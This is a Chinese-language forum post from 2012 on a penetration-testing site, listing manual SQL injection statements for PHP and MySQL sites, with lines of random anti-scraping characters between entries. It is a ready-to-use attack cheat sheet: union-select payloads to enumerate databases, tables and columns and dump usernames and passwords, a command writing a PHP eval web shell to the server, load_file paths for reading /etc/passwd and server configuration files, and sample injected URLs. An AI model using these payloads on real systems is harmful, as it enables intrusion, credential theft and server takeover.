中国网络渗透测试联盟
标题:
PHP+MySQL 手工注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 13:50
标题:
PHP+MySQL 手工注入语句
.
8 e7 e. p; K- w/ G r( R
! {8 [. [, \$ U: k8 ~' \* j
暴字段长度
! E8 y/ w) ]6 u- C& v$ p% j3 ?
Order by num/*
5 q& d" A( U2 b6 e4 p& @8 Q
匹配字段
9 e! W/ o# y/ c R# W
and 1=1 union select 1,2,3,4,5…….n/*
% r6 O1 W3 y, X& f6 h
暴字段位置
/ b6 b% h6 C7 A$ \8 ~
and 1=2 union select 1,2,3,4,5…..n/*
0 r* K9 y I! z$ g! l# i$ w
利用内置函数暴数据库信息
, ]/ `' w }* t3 g: X* ]& ?
version() database() user()
2 N" J5 }/ u( }8 r3 `0 _' G& y7 z
不用猜解可用字段暴数据库信息(有些网站不适用):
+ N& Q, _# A: \9 e& q% S2 e' p
and 1=2 union all select version() /*
+ P0 [+ d( H2 Y& N8 o# J% _- S
and 1=2 union all select database() /*
1 }& U% y" i6 Z" I4 q9 A
and 1=2 union all select user() /*
, [! E: T) N' d+ a7 [' l
操作系统信息:
2 R& _( E% m" @$ U
and 1=2 union all select @@global.version_compile_os from mysql.user /*
6 R3 q8 j% c' j! ]+ O
数据库权限:
. Q/ T' k7 c( `7 `: @8 G( u: Q
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
. q+ z; M7 L# M5 |' ~2 B7 Q0 ]) Z
暴库 (mysql>5.0)
& D1 }; P# G# Y- `
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
! G# U3 e5 M; ?1 Y. I9 n7 T( S
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
! k/ ~' {7 f4 {6 ]) O4 L! r( Y
猜表
3 B$ b/ O& Q* {0 S: x! S, Q3 @) G
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
/ Q1 Y$ \9 ~7 X2 F' ]# N) ]
猜字段
) }. D/ g5 c7 m2 D7 L1 m+ ?
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
6 H% e: [7 F: F! j+ U! @9 `
暴密码
0 o1 p% O2 p+ H; H3 D* o5 o5 l6 f
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
/ @+ y! F/ H. R" z2 H3 t
高级用法(一个可用字段显示两个数据内容):
. ^, i' l" U& z* g
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
% F2 s4 i) T5 B5 P9 c" e
直接写马(Root权限)
. x% D: n3 z. D
条件:1、知道站点物理路径
$ B! p+ C* x9 I. y/ H6 S: r
2、有足够大的权限(可以用select …. from mysql.user测试)
; i3 @7 N- c8 ]
3、magic_quotes_gpc()=OFF
# \4 p( M+ @# x* ?1 p2 ?
select ‘<?php eval($_POST[cmd])?>' into outfile ‘物理路径'
$ H- P- Q0 @6 Q/ N
and 1=2 union all select 一句话HEX值 into outfile '路径'
4 [! k# ?9 D6 L8 s1 ]7 A, `
load_file() 常用路径:
$ t+ g( S( v8 R0 ^, d
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
1 f3 L/ X6 D% e0 l
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
# e' m& l6 C0 d
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
5 e) h2 f) N) D! C1 Y! x
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
2 M4 W" U. j9 s- b6 M% b+ f
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
9 W, v# o z6 o. b! U; ~0 t
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
9 [% p1 h4 W% M+ A
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
* K2 f, k2 [ W. v
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
9 V# I) \/ S O! T; c/ C
8、d:\APACHE\Apache2\conf\httpd.conf
4 e' p: f1 h; x
9、C:\Program Files\mysql\my.ini
% H8 O/ f# M1 j1 j
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
, f- S+ s3 C2 G8 ?+ }) p
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
/ i; k7 m+ C i! ?9 r" X& i
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
5 r! w ?. X: L6 [% }! ~
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
! R4 `' y+ X5 p( ^/ t# Q3 ]" \, b
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
0 k; l0 x7 {1 F2 Q5 G2 ~+ @
15、 /etc/sysconfig/iptables 本看防火墙策略
6 u# s6 J0 U" J8 o2 s( q
16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
8 x$ m. W3 e; K5 |' D# _7 Y5 B
17 、/etc/my.cnf MYSQL的配置文件
2 j/ p q2 U# V( S+ R. M" a. D
18、 /etc/redhat-release 红帽子的系统版本
4 o& u3 y" }9 C) Q! ]. p& P
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
) V& w. ^$ q: u; S: K. a
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
! P9 ? n4 O# f8 W! t2 {
21、/usr/local/app/php5 b/php.ini //PHP相关设置
6 n. E2 V% @4 S
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
3 [+ J5 i! J1 z |! s( D
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
! x) g7 v4 [9 Q
24、c:\windows\my.ini
/ U7 o3 t) W3 z1 P+ X& l
25、c:\boot.ini
# t# E1 y1 ?7 @7 v+ N
网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
9 \$ A9 D- }& [/ ~( K; K" C) E
注:
/ T- }7 L# |) J/ b4 a
Char(60)表示 <
( L* `; C8 J/ }" ?
Char(32)表示 空格
, J w9 L& P1 B/ j
手工注射时出现的问题:
R, }5 d& y O) C+ w- I$ K
当注射后页面显示:
; f/ O8 X0 b1 p# s; d% z% _' \
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
0 S9 e7 n4 w x& N: D( s. [
如:
http://www.hake.ccc./mse/researc ... 0union%20select%201
,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
5 v6 F' z$ C$ x/ c# S) L
这是由于前后编码不一致造成的,
9 G" ]" j5 h* v$ [$ u
解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:
1 b/ c, T( ^5 } S
http://www.hake.cc/mse/research/ ... 0union%20select%201
,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
3 [; d- ^# G" V5 l/ G# b: e, K
既可以继续注射了。。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2